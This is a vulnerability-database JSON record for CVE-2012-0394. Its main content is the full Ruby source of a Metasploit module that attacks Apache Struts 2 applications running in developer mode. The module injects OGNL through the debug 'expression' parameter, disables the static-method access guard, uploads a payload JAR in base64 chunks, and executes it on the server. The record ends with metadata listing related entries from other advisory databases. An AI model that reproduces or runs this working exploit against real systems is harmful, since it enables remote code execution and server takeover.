{"type": "zdt", "lastseen": "2016-04-20T01:42:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0394"], "history": [], "title": "Apache Struts Developer Mode OGNL Execution Exploit", "published": "2014-02-04T00:00:00", "href": "http://0day.today/exploit/description/21855", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This Metasploit module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "hash": "462e7d865e25bc28d344b55e6907b94fcb297a670bef2f60a9482b2b82a1dc08", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Developer Mode OGNL Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache\r\n Struts 2. The problem exists on applications running in developer mode,\r\n where the DebuggingInterceptor allows evaluation and execution of OGNL\r\n expressions, which allows remote attackers to execute arbitrary Java\r\n code. This module has been tested successfully in Struts 2.3.16, Tomcat\r\n 7 and Ubuntu 10.04.\r\n },\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery and PoC\r\n 'Andreas Nusser', # Vulnerability discovery and PoC\r\n 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\\\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0394'],\r\n [ 'OSVDB', '78276'],\r\n [ 'EDB', '18329'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ],\r\n [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ]\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Struts 2', { } ]\r\n ],\r\n 'DisclosureDate' => 'Jan 06 2012',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', \"/struts2-blank/example/HelloWorld.action\"])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n vprint_status(\"Testing to see if the target can evaluate our Java code...\")\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n\r\n res = execute_command(\"new java.lang.Integer(#{addend_one}+#{addend_two})\")\r\n\r\n if res and res.code == 200 and res.body.to_i == sum\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n if res and res.code == 200 and res.body.to_s =~ /#{sum}/\r\n vprint_status(\"Code got evaluated. Target seems vulnerable, but the response contains something else:\")\r\n vprint_line(res.body.to_s)\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n @payload_jar = rand_text_alphanumeric(4+rand(4)) + \".jar\"\r\n\r\n upload_jar\r\n execute_jar\r\n end\r\n\r\n def upload_jar\r\n append = 'false'\r\n jar = payload.encoded_jar.pack\r\n chunk_length = 384 # 512 bytes when base64 encoded\r\n\r\n while(jar.length > chunk_length)\r\n java_upload_part(jar[0, chunk_length], @payload_jar, append)\r\n jar = jar[chunk_length, jar.length - chunk_length]\r\n append='true'\r\n end\r\n java_upload_part(jar, @payload_jar, append)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_jar\r\n cmd = \"\"\r\n # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n # create classloader\r\n cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()}),\"\r\n # load class\r\n cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n # invoke main method\r\n cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\"\r\n cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n execute_command(cmd)\r\n end\r\n\r\n def execute_command(cmd)\r\n injection = \"#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD\"\r\n injection.gsub!(/CMD/, cmd)\r\n\r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s),\r\n 'method' => 'GET',\r\n 'vars_get' =>\r\n {\r\n 'debug' => 'command',\r\n 'expression' => injection\r\n }\r\n })\r\n\r\n return res\r\n end\r\n\r\n\r\nend\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-21855", "sourceHref": "http://0day.today/exploit/21855", "modified": "2014-02-04T00:00:00", "reporter": "metasploit", "enchantments": {"vulnersScore": 6.0}}

{"result": {"cve": [{"id": "CVE-2012-0394", "type": "cve", "title": "CVE-2012-0394", "description": "** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"", "published": "2012-01-08T10:55:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0394", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-09-03T16:10:11"}], "metasploit": [{"id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEV_MODE", "type": "metasploit", "title": "CVE-2012-0394 Apache Struts 2 Developer Mode OGNL Execution ", "description": "This module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This module has been tested successfully on Struts 2.3.16, Tomcat 7 and Ubuntu 10.04.", "published": "2014-01-26T00:17:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts_dev_mode", "cvelist": ["CVE-2012-0394"], "lastseen": "2017-06-05T14:03:29"}], "packetstorm": [{"id": "PACKETSTORM:125020", "type": "packetstorm", "title": "Apache Struts Developer Mode OGNL Execution", "description": "", "published": "2014-02-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/125020/Apache-Struts-Developer-Mode-OGNL-Execution.html", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-12-05T22:25:36"}], "exploitdb": [{"id": "EDB-ID:31434", "type": "exploitdb", "title": "Apache Struts Developer Mode OGNL Execution", "description": "Apache Struts Developer Mode OGNL Execution. CVE-2012-0394. Remote exploit for java platform", "published": "2014-02-05T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/31434/", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-02-03T14:38:10"}, {"id": "EDB-ID:18329", "type": "exploitdb", "title": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities", "description": "Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities. CVE-2012-0391,CVE-2012-0392,CVE-2012-0393,CVE-2012-0394. Webapps exploits for multiple platform", "published": "2012-01-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18329/", "cvelist": ["CVE-2012-0391", "CVE-2012-0393", "CVE-2012-0392", "CVE-2012-0394"], "lastseen": "2016-02-02T09:32:08"}], "seebug": [{"id": "SSV-84761", "type": "seebug", "title": "Apache Struts Developer Mode OGNL Execution", "description": "Summary: \nApache Struts 2.3.1.1 previous version of the DebuggingInterceptor component in the presence of vulnerabilities. When using the development mode, a remote attacker could exploit the vulnerability by means of that vector to execute arbitrary commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-84761", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-07-26T22:13:41"}, {"id": "SSV-62324", "type": "seebug", "title": "Struts 2.3.1 DebuggingInterceptor command execution vulnerability", "description": "No description provided by source.", "published": "2013-03-27T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-62324", "cvelist": ["CVE-2012-0394"], "lastseen": "2016-07-31T11:06:13"}], "canvas": [{"id": "STRUTSCODEINJECTION", "type": "canvas", "title": "Immunity Canvas: STRUTSCODEINJECTION", "description": "**Name**| strutsCodeInjection \n---|--- \n**CVE**| CVE-2012-0394 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Struts Code Injector \n**Notes**| CVE Name: CVE-2012-0394 \nVENDOR: Apache \nNotes: \nCVE-2012-0394 \n\\- Struts &lt;= 2.2.1.1 (ExceptionDelegator) \n \nWhen an exception occurs while applying parameter values to properties, the \nvalue is evaluated as OGNL expression which can be abused to accomplish Java code execution. \n \n\\- Struts &lt;= 2.3.1 (CookieInterceptor) \n \nAgain an OGNL expression can be abused to accomplish arbitrary Java code execution \nby means of a crafted cookie. \n \nCVE-2010-1870 \n\\- Struts &lt;= 2.2.0 (Xworks filter bypass) \nUnicode characters can be used to bypass character restrictions on OGNL expressions. \n \n \nRepeatability: Infinite \nReferences: \nCVE-2012-0394 \nhttp://struts.apache.org/2.x/docs/s2-008.html \nhttps://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt \n \nCVE-2010-1870 \nhttp://seclists.org/fulldisclosure/2010/Jul/183 \nhttp://struts.apache.org/2.2.1/docs/s2-005.html \n \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0394 \nCompatibility: \nStruts &lt;= 2.2.1.1 (ExceptionDelegator) \nStruts &lt;= 2.3.1 (CookieInterceptor) \nStruts &lt;= 2.2.0 (XworksFilterBypass) \n \n\n", "published": "2012-01-08T10:55:01", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/strutsCodeInjection", "cvelist": ["CVE-2010-1870", "CVE-2012-0394"], "lastseen": "2016-09-25T14:12:35"}]}}